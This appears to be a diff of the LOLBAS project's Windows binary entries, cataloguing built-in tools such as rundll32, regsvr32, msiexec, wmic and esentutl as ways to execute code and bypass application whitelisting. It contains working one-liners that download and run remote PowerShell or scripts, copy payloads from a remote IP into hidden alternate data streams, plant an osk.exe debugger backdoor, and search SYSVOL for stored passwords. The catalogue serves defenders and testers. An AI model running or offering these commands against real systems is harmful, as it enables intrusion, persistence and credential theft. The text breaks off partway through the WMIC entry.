Copies the source EXE to an Alternate Data Stream (ADS) of the destination file.
esentutl.exe /y C:\ADS\file.txt:file.exe /d c:\ADS\file.exe /o
Copies the source Alternate Data Stream (ADS) to the destination EXE.
esentutl.exe /y \\82.221.113.85\webdav\file.exe /d c:\ADS\file.txt:file.exe /o
Copies the source EXE to the destination Alternate Data Stream (ADS) of the destination file.
esentutl.exe /y \\82.221.113.85\webdav\file.exe /d c:\ADS\file.exe /o
Copies the source EXE to the destination EXE file.
esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o
Copies the source EXE to the destination EXE file
```
* Resources:
* https://twitter.com/egre55/status/985994639202283520
* Full path:
* c:\windows\system32\esentutl.exe
* c:\windows\sysWOW64\esentutl.exe
* Notes: Thanks to egre55 - @egre55

24
OSBinaries/Expand.exe.md Normal file
View File

@ -0,0 +1,24 @@
## Expand.exe
* Functions: Download, Copy, Add ADS
```
expand \\webdav\folder\file.bat c:\ADS\file.bat
Copies source file to destination.
expand c:\ADS\file1.bat c:\ADS\file2.bat
Copies source file to destination.
expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat
Copies source file to destination Alternate Data Stream (ADS).
```
* Resources:
* https://twitter.com/infosecn1nja/status/986628482858807297
* https://twitter.com/Oddvarmoe/status/986709068759949319
* Full path:
* c:\windows\system32\Expand.exe
* c:\windows\sysWOW64\Expand.exe
* Notes: Thanks to Rahmat Nurfauzi - @infosecn1nja, Oddvar Moe - @oddvarmoe

17
OSBinaries/Explorer.exe.md Normal file
View File

@ -0,0 +1,17 @@
## Explorer.exe
* Functions: Execute
```
explorer.exe calc.exe
Executes calc.exe as a subprocess of explorer.exe.
```
* Resources:
* https://twitter.com/bohops/status/986984122563391488
* Full path:
* c:\windows\explorer.exe
* c:\windows\sysWOW64\explorer.exe
* Notes: Thanks to Jimmy - @bohops

17
OSBinaries/Extexport.exe.md Normal file
View File

@ -0,0 +1,17 @@
## Extexport.exe
* Functions: Execute
```
Extexport.exe c:\test foo bar
Load a DLL located in the c:\\test folder with one of the following names: mozcrt19.dll, mozsqlite3.dll, or sqlite.dll
```
* Resources:
* http://www.hexacorn.com/blog/2018/04/24/extexport-yet-another-lolbin/
* Full path:
* C:\Program Files\Internet Explorer\Extexport.exe
* C:\Program Files\Internet Explorer(x86)\Extexport.exe
* Notes: Thanks to Adam - @hexacorn

25
OSBinaries/Extrac32.exe.md Normal file
View File

@ -0,0 +1,25 @@
## Extrac32.exe
* Functions: Add ADS, Download
```
extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file.
extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe
Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file.
extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt
Copy the source file to the destination file and overwrite it.
```
* Resources:
* https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
* https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
* https://twitter.com/egre55/status/985994639202283520
* Full path:
* c:\windows\system32\extrac32.exe
* c:\windows\sysWOW64\extrac32.exe
* Notes: Thanks to Oddvar Moe - @oddvarmoe, egre55 - @egre55

24
OSBinaries/Findstr.exe.md Normal file
View File

@ -0,0 +1,24 @@
## Findstr.exe
* Functions: Add ADS, Search
```
findstr /V /L W3AllLov3DonaldTrump c:\ADS\file.exe > c:\ADS\file.txt:file.exe
Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.
findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.txt:file.exe
Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.
findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml
Search for stored password in Group Policy files stored on SYSVOL.
```
* Resources:
* https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
* https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
* Full path:
* c:\windows\system32\findstr.exe
* c:\windows\sysWOW64\findstr.exe
* Notes: Thanks to Oddvar Moe - @oddvarmoe

22
OSBinaries/Forfiles.exe.md Normal file
View File

@ -0,0 +1,22 @@
## Forfiles.exe
* Functions: Execute, Read ADS
```
forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe
Executes calc.exe since there is a match for notepad.exe in the c:\\windows\\System32 folder.
forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe"
Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\\windows\\system32 folder.
```
* Resources:
* https://twitter.com/vector_sec/status/896049052642533376
* https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
* https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
* Full path:
* C:\Windows\system32\forfiles.exe
* C:\Windows\sysWOW64\forfiles.exe
* Notes: Thanks to Eric - @vector_sec, Oddvar Moe - @oddvarmoe

22
OSBinaries/Gpscript.exe.md Normal file
View File

@ -0,0 +1,22 @@
## Gpscript.exe
* Functions: Execute
```
Gpscript /logon
Executes logon scripts configured in Group Policy.
Gpscript /startup
Executes startup scripts configured in Group Policy.
```
* Resources:
* https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/
* Full path:
* c:\windows\system32\gpscript.exe
* c:\windows\sysWOW64\gpscript.exe
* Notes: Thanks to Oddvar Moe - @oddvarmoe
Requires administrative rights and modifications to local group policy settings.

17
OSBinaries/IEExec.exe.md Normal file
View File

@ -0,0 +1,17 @@
## IEExec.exe
* Functions: Execute
```
ieexec.exe http://x.x.x.x:8080/bypass.exe
Executes bypass.exe from the remote server.
```
* Resources:
* https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/
* Full path:
* c:\windows\system32\ieexec.exe
* c:\windows\sysWOW64\ieexec.exe
* Notes: Thanks to Casey Smith - @subtee

19
OSBinaries/Ie4unit.exe.md Normal file
View File

@ -0,0 +1,19 @@
## Ie4unit.exe
* Functions: Execute
```
ie4unit.exe -BaseSettings
Executes commands from a specially prepared ie4uinit.inf file.
```
* Resources:
* https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/
* Full path:
* c:\windows\system32\ie4unit.exe
* c:\windows\sysWOW64\ie4unit.exe
* c:\windows\system32\ieuinit.inf
* c:\windows\sysWOW64\ieuinit.inf
* Notes: Thanks to Jimmy - @bohops

19
OSBinaries/InfDefaultInstall.exe.md Normal file
View File

@ -0,0 +1,19 @@
## InfDefaultInstall.exe
* Functions: Execute
```
InfDefaultInstall.exe Infdefaultinstall.inf
Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.
```
* Resources:
* https://twitter.com/KyleHanslovan/status/911997635455852544
* https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a
* https://blog.conscioushacker.io/index.php/2017/10/25/evading-microsofts-autoruns/
* Full path:
* c:\windows\system32\Infdefaultinstall.exe
* c:\windows\sysWOW64\Infdefaultinstall.exe
* Notes: Thanks to Kyle Hanslovan - @kylehanslovan

24
OSBinaries/InstallUtil.exe.md Normal file
View File

@ -0,0 +1,24 @@
## InstallUtil.exe
* Functions: Execute
```
InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
Execute the target .NET DLL or EXE.
```
* Resources:
* https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/
* https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12
* http://subt0x10.blogspot.no/2017/09/banned-file-execution-via.html
* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/InstallUtil.md
* https://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/
* https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
* Full path:
* C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe
* C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe
* C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
* C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
* Notes: Thanks to Casey Smith - @subtee

23
OSBinaries/Makecab.exe.md Normal file
View File

@ -0,0 +1,23 @@
## Makecab.exe
* Functions: Package, Add ADS, Download
```
makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file.
makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab
Compresses the target file and stores it in the target file.
makecab \\webdavserver\webdav\file.exe C:\Folder\file.txt:file.cab
Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file.
```
* Resources:
* https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
* Full path:
* c:\windows\system32\makecab.exe
* c:\windows\sysWOW64\makecab.exe
* Notes: Thanks to Oddvar Moe - @oddvarmoe

22
OSBinaries/Mavinject.exe.md Normal file
View File

@ -0,0 +1,22 @@
## Mavinject.exe
* Functions: Execute, Read ADS
```
MavInject.exe 3110 /INJECTRUNNING c:\folder\evil.dll
Inject evil.dll into a process with PID 3110.
Mavinject.exe 4172 /INJECTRUNNING "c:\ads\file.txt:file.dll"
Inject file.dll stored as an Alternate Data Stream (ADS) into a process with PID 4172.
```
* Resources:
* https://twitter.com/gN3mes1s/status/941315826107510784
* https://twitter.com/Hexcorn/status/776122138063409152
* https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
* Full path:
* C:\Windows\System32\mavinject.exe
* C:\Windows\SysWOW64\mavinject.exe
* Notes: Thanks to Giuseppe N3mes1s - @gN3mes1s, Adam - @hexacorn, Oddvar Moe - @oddvarmoe

27
OSBinaries/Msbuild.exe.md Normal file
View File

@ -0,0 +1,27 @@
## Msbuild.exe
* Functions: Execute
```
msbuild.exe pshell.xml
Build and execute a C# project stored in the target XML file.
msbuild.exe Msbuild.csproj
Build and execute a C# project stored in the target CSPROJ file.
```
* Resources:
* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Trusted_Developer_Utilities.md
* https://github.com/Cn33liz/MSBuildShell
* https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/
* https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
* Full path:
* C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe
* C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe
* C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe
* C:\Windows\Microsoft.NET\Framework64\v3.5\Msbuild.exe
* C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
* C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe
* Notes: Thanks to Casey Smith - @subtee, Cn33liz - @Cneelis

18
OSBinaries/Msconfig.exe.md Normal file
View File

@ -0,0 +1,18 @@
## Msconfig.exe
* Functions: Execute
```
Msconfig.exe -5
Executes command embeded in crafted c:\windows\system32\mscfgtlc.xml.
```
* Resources:
* https://twitter.com/pabraeken/status/991314564896690177
* Full path:
* c:\windows\system32\msconfig.exe
* Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
See the Payloads folder for an example mscfgtlc.xml file.

24
OSBinaries/Msdt.exe.md Normal file
View File

@ -0,0 +1,24 @@
## Msdt.exe
* Functions: Execute
```
Open .diagcab package
msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file.
```
* Resources:
* https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/
* https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
* https://twitter.com/harr0ey/status/991338229952598016
* Full path:
* C:\Windows\System32\Msdt.exe
* C:\Windows\SysWOW64\Msdt.exe
* Notes: Thanks to:
See the Payloads folder for an example PCW8E57.xml file.

27
OSBinaries/Msiexec.exe.md Normal file
View File

@ -0,0 +1,27 @@
## Msiexec.exe
* Functions: Execute
```
msiexec /quiet /i cmd.msi
Installs the target .MSI file silently.
msiexec /q /i http://192.168.100.3/tmp/cmd.png
Installs the target remote & renamed .MSI file silently.
msiexec /y "C:\folder\evil.dll"
Calls DLLRegisterServer to register the target DLL.
msiexec /z "C:\folder\evil.dll"
Calls DLLRegisterServer to un-register the target DLL.
```
* Resources:
* https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/
* https://twitter.com/PhilipTsukerman/status/992021361106268161
* Full path:
* c:\windows\system32\msiexec.exe
* c:\windows\sysWOW64\msiexec.exe
* Notes: Thanks to ? - @netbiosX, PhilipTsukerman - @PhilipTsukerman

27
OSBinaries/Netsh.exe.md Normal file
View File

@ -0,0 +1,27 @@
## Netsh.exe
* Functions: Execute, Surveillance
```
netsh.exe trace start capture=yes filemode=append persistent=yes tracefile=\\server\share\file.etl IPv4.Address=!(<IPofRemoteFileShare>)
netsh.exe trace show status
Capture network traffic on remote file share.
netsh.exe add helper C:\Path\file.dll
Load (execute) NetSh.exe helper DLL file.
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1
Forward traffic from the listening address and proxy to a remote system.
```
* Resources:
* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Persistence/Netsh_Helper_DLL.md
* https://attack.mitre.org/wiki/Technique/T1128
* https://twitter.com/teemuluotio/status/990532938952527873
* Full path:
* C:\Windows\System32
* C:\Windows\SysWOW64
* Notes:

17
OSBinaries/Nltest.exe.md Normal file
View File

@ -0,0 +1,17 @@
## Nltest.exe
* Functions: Credentials
```
nltest.exe /SERVER:192.168.1.10 /QUERY
```
* Resources:
* https://twitter.com/sysopfb/status/986799053668139009
* https://ss64.com/nt/nltest.html
* Full path:
* c:\windows\system32\nltest.exe
* Notes: Thanks to Sysopfb - @sysopfb

20
OSBinaries/Openwith.exe.md Normal file
View File

@ -0,0 +1,20 @@
## Openwith.exe
* Functions: Execute
```
OpenWith.exe /c C:\test.hta
Opens the target file with the default application.
OpenWith.exe /c C:\testing.msi
Opens the target file with the default application.
```
* Resources:
* https://twitter.com/harr0ey/status/991670870384021504
* Full path:
* c:\windows\system32\Openwith.exe
* c:\windows\sysWOW64\Openwith.exe
* Notes: Thanks to Matt harr0ey - @harr0ey

25
OSBinaries/Pcalua.exe.md Normal file
View File

@ -0,0 +1,25 @@
## Pcalua.exe
* Functions: Execute
```
pcalua.exe -a calc.exe
Open the target .EXE using the Program Compatibility Assistant.
pcalua.exe -a \\server\payload.dll
Open the target .DLL file with the Program Compatibilty Assistant.
pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java
Open the target .CPL file with the Program Compatibility Assistant.
```
* Resources:
* https://twitter.com/KyleHanslovan/status/912659279806640128
* Full path:
* c:\windows\system32\pcalua.exe
* Notes: Thanks to:
fab - @0rbz_
Kyle Hanslovan - @KyleHanslovan

16
OSBinaries/Pcwrun.exe.md Normal file
View File

@ -0,0 +1,16 @@
## Pcwrun.exe
* Functions: Execute
```
Pcwrun.exe c:\temp\beacon.exe
Open the target .EXE file with the Program Compatibility Wizard.
```
* Resources:
* https://twitter.com/pabraeken/status/991335019833708544
* Full path:
* c:\windows\system32\pcwrun.exe
* Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken

17
OSBinaries/Powershell.exe.md Normal file
View File

@ -0,0 +1,17 @@
## Powershell.exe
* Functions: Execute, Read ADS
```
powershell -ep bypass - < c:\temp:ttt
Execute the encoded PowerShell command stored in an Alternate Data Stream (ADS).
```
* Resources:
* https://twitter.com/Moriarty_Meng/status/984380793383370752
* Full path:
* C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
* C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
* Notes: Thanks to Moriarty - @Moriarty_Meng

18
OSBinaries/PresentationHost.exe.md Normal file
View File

@ -0,0 +1,18 @@
## PresentationHost.exe
* Functions: Execute
```
Presentationhost.exe C:\temp\Evil.xbap
Executes the target XAML Browser Application (XBAP) file.
```
* Resources:
* https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf
* https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
* Full path:
* c:\windows\system32\PresentationHost.exe
* c:\windows\sysWOW64\PresentationHost.exe
* Notes: Thanks to Casey Smith - @subtee

24
OSBinaries/Print.exe.md Normal file
View File

@ -0,0 +1,24 @@
## Print.exe
* Functions: Download, Copy, Add ADS
```
print /D:C:\ADS\File.txt:file.exe C:\ADS\File.exe
Copy file.exe into the Alternate Data Stream (ADS) of file.txt.
print /D:C:\ADS\CopyOfFile.exe C:\ADS\FileToCopy.exe
Copy FileToCopy.exe to the target C:\ADS\CopyOfFile.exe
print /D:C:\OutFolder\outfile.exe \\WebDavServer\Folder\File.exe
Copy File.exe from a network share to the target c:\OutFolder\outfile.exe.
```
* Resources:
* https://twitter.com/Oddvarmoe/status/985518877076541440
* https://www.youtube.com/watch?v=nPBcSP8M7KE&lc=z22fg1cbdkabdf3x404t1aokgwd2zxasf2j3rbozrswnrk0h00410
* Full path:
* C:\Windows\System32\print.exe
* C:\Windows\SysWOW64\print.exe
* Notes: Thanks to Oddvar Moe - @oddvarmoe

23
OSBinaries/Psr.exe.md Normal file
View File

@ -0,0 +1,23 @@
## Psr.exe
* Functions: Surveillance
```
psr.exe /start /gui 0 /output c:\users\user\out.zip
Capture screenshots of the desktop and save them in the target .ZIP file.
psr.exe /start /maxsc 100 /gui 0 /output c:\users\user\out.zip
Capture a maximum of 100 screenshots of the desktop and save them in the target .ZIP file.
psr.exe /stop
Stop the Problem Step Recorder.
```
* Resources:
* https://www.sans.org/summit-archives/file/summit-archive-1493861893.pdf
* Full path:
* C:\Windows\System32\Psr.exe
* C:\Windows\SysWOW64\Psr.exe
* Notes: Thanks to

25
OSBinaries/Regasm.exe.md Normal file
View File

@ -0,0 +1,25 @@
## Regasm.exe
* Functions: Execute
```
regasm.exe /U AllTheThingsx64.dll
Loads the target .DLL file and executes the UnRegisterClass function.
regasm.exe AllTheThingsx64.dll
Loads the target .DLL file and executes the RegisterClass function.
```
* Resources:
* https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/
* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/RegSvcsRegAsmBypass.cs
* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/RegsvcsRegasm.md
* https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
* Full path:
* C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe
* C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe
* C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
* C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe
* Notes: Thanks to Casey Smith - @subtee

17
OSBinaries/Register-cimprovider.exe.md Normal file
View File

@ -0,0 +1,17 @@
## Register-cimprovider.exe
* Functions: Execute
```
Register-cimprovider -path "C:\folder\evil.dll"
Load the target .DLL.
```
* Resources:
* https://twitter.com/PhilipTsukerman/status/992021361106268161
* Full path:
* c:\windows\system32\Register-cimprovider.exe
* c:\windows\sysWOW64\Register-cimprovider.exe
* Notes: Thanks to PhilipTsukerman - @PhilipTsukerman

22
OSBinaries/Regsvcs.exe.md Normal file
View File

@ -0,0 +1,22 @@
## Regsvcs.exe
* Functions: Execute
```
regsvcs.exe AllTheThingsx64.dll
Loads the target .DLL file and executes the RegisterClass function.
```
* Resources:
* https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/
* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/RegSvcsRegAsmBypass.cs
* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/RegsvcsRegasm.md
* https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
* Full path:
* C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe
* C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regsvcs.exe
* C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
* C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe
* Notes: Thanks to Casey Smith - @subtee

22
OSBinaries/Regsvr32.exe.md Normal file
View File

@ -0,0 +1,22 @@
## Regsvr32.exe
* Functions: Execute
```
regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
Execute the specified remote .SCT script with scrobj.dll.
Execute the specified local .SCT script with scrobj.dll.
```
* Resources:
* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Regsvr32.md
* https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
* https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/
* Full path:
* C:\Windows\System32\regsvr32.exe
* C:\Windows\SysWOW64\regsvr32.exe
* Notes: Thanks to Casey Smith - @subtee

21
OSBinaries/Replace.exe.md Normal file
View File

@ -0,0 +1,21 @@
## Replace.exe
* Functions: Copy, Download
```
replace.exe C:\Source\File.cab C:\Destination /A
Copy the specified file to the destination folder.
replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A
Copy the specified file to the destination folder.
```
* Resources:
* https://twitter.com/elceef/status/986334113941655553
* https://twitter.com/elceef/status/986842299861782529
* Full path:
* C:\Windows\System32\replace.exe
* C:\Windows\SysWOW64\replace.exe
* Notes: Thanks to elceef - @elceef

20
OSBinaries/Robocopy.exe.md Normal file
View File

@ -0,0 +1,20 @@
## Robocopy.exe
* Functions: Copy
```
Robocopy.exe C:\SourceFolder C:\DestFolder
Copy the entire contents of the SourceFolder to the DestFolder.
Robocopy.exe \\SERVER\SourceFolder C:\DestFolder
Copy the entire contents of the SourceFolder to the DestFolder.
```
* Resources:
* https://social.technet.microsoft.com/wiki/contents/articles/1073.robocopy-and-a-few-examples.aspx
* Full path:
* c:\windows\system32\binary.exe
* c:\windows\sysWOW64\binary.exe
* Notes: Thanks to Name of guy - @twitterhandle

26
OSBinaries/Rpcping.exe.md Normal file
View File

@ -0,0 +1,26 @@
## Rpcping.exe
* Functions: Credentials
```
rpcping -s 127.0.0.1 -t ncacn_np
Send a RPC test connection to the target server (-s) sending the password hash in the process.
rpcping -s 192.168.1.10 -ncacn_np
Send a RPC test connection to the target server (-s) sending the password hash in the process.
rpcping -s 127.0.0.1 -e 1234 -a privacy -u NTLM
Send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.
```
* Resources:
* https://twitter.com/subtee/status/872797890539913216
* https://github.com/vysec/RedTips
* https://twitter.com/vysecurity/status/974806438316072960
* https://twitter.com/vysecurity/status/873181705024266241
* Full path:
* C:\Windows\System32\rpcping.exe
* C:\Windows\SysWOW64\rpcping.exe
* Notes: Thanks to Casey Smith - @subtee, Vincent Yiu - @vysecurity

36
OSBinaries/Rundll32.exe.md Normal file
View File

@ -0,0 +1,36 @@
## Rundll32.exe
* Functions: Execute, Read ADS
```
rundll32.exe AllTheThingsx64,EntryPoint
Example command. AllTheThingsx64 would be a .DLL file and EntryPoint would be the name of the entry point in the .DLL file to execute.
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"
Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site.
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");
Use Rundll32.exe to execute a JavaScript script that runs calc.exe.
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
Use Rundll32.exe to execute a JavaScript script that runs calc.exe and then kills the Rundll32.exe process that was started.
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test")
Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script.
rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain
Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS).
```
* Resources:
* https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/
* https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_7
* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Rundll32.md
* https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
* https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
* Full path:
* C:\Windows\System32\rundll32.exe
* C:\Windows\SysWOW64\rundll32.exe
* Notes: Thanks to Casey Smith - @subtee

19
OSBinaries/Runonce.exe.md Normal file
View File

@ -0,0 +1,19 @@
## Runonce.exe
* Functions: Execute
```
Runonce.exe /AlternateShellStartup
Executes a Run Once Task that has been configured in the registry.
```
* Resources:
* https://twitter.com/pabraeken/status/990717080805789697
* https://cmatskas.com/configure-a-runonce-task-on-windows/
* Full path:
* c:\windows\system32\runonce.exe
* c:\windows\sysWOW64\runonce.exe
* Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
Requires Administrative access.

17
OSBinaries/Runscripthelper.exe.md Normal file
View File

@ -0,0 +1,17 @@
## Runscripthelper.exe
* Functions: Execute
```
runscripthelper.exe surfacecheck \\?\C:\Test\Microsoft\Diagnosis\scripts\test.txt C:\Test
Execute the PowerShell script named test.txt.
```
* Resources:
* https://posts.specterops.io/bypassing-application-whitelisting-with-runscripthelper-exe-1906923658fc
* Full path:
* C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe
* C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe
* Notes: Thanks to Matt Graeber - @mattifestation

19
OSBinaries/SC.exe.md Normal file
View File

@ -0,0 +1,19 @@
## SC.exe
* Functions: Execute, Read ADS, Create Service, Start Service
```
sc create evilservice binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto
sc start evilservice
```
* Resources:
* https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
* Full path:
* C:\Windows\System32\sc.exe
* C:\Windows\SysWOW64\sc.exe
* Notes: Thanks to Oddvar Moe - @oddvarmoe

22
OSBinaries/Scriptrunner.exe.md Normal file
View File

@ -0,0 +1,22 @@
## Scriptrunner.exe
* Functions: Execute
```
Scriptrunner.exe -appvscript calc.exe
Execute calc.exe.
ScriptRunner.exe -appvscript "\\fileserver\calc.cmd"
Execute the calc.cmd script on the remote share.
```
* Resources:
* https://twitter.com/KyleHanslovan/status/914800377580503040
* https://twitter.com/NickTyrer/status/914234924655312896
* https://github.com/MoooKitty/Code-Execution
* Full path:
* c:\windows\system32\scriptrunner.exe
* c:\windows\sysWOW64\scriptrunner.exe
* Notes: Thanks to Nick Tyrer - @NickTyrer

16
OSBinaries/SyncAppvPublishingServer.exe.md Normal file
View File

@ -0,0 +1,16 @@
## SyncAppvPublishingServer.exe
* Functions: Execute
```
SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX"
Example command on how inject Powershell code into the process
```
* Resources:
* https://twitter.com/monoxgas/status/895045566090010624
* Full path:
* C:\Windows\System32\SyncAppvPublishingServer.exe
* Notes: Thanks to Nick Landers - @monoxgas

58
OSBinaries/WMIC.exe.md Normal file
View File

@ -0,0 +1,58 @@
## WMIC.exe
* Functions: Reconnaissance, Execute, Read ADS
```
wmic.exe process call create calc
Execute calc.exe.
wmic.exe process call create "c:\ads\file.txt:program.exe"
Execute a .EXE file stored as an Alternate Data Stream (ADS).
wmic.exe useraccount get /ALL
List the user accounts on the machine.
wmic.exe process get caption,executablepath,commandline
Gets the command line used to execute a running program.
wmic.exe qfe get description,installedOn /format:csv
Gets a list of installed Windows updates.
wmic.exe /node:"192.168.0.1" service where (caption like "%sql server (%")
Check to see if the target system is running SQL.
get-wmiobject class "win32_share" namespace "root\CIMV2" computer "targetname"
Use the PowerShell cmdlet to list the shares on a remote server.
wmic.exe /user:<username> /password:<password> /node:<computer_name> process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"
Add cmd.exe as a debugger for the osk.exe process. Each time osk.exe is run, cmd.exe will be run as well.
wmic.exe /node:"192.168.0.1" process call create "evil.exe"
Execute evil.exe on the remote system.
wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "at 9:00PM c:\GoogleUpdate.exe ^> c:\notGoogleUpdateResults.txt"
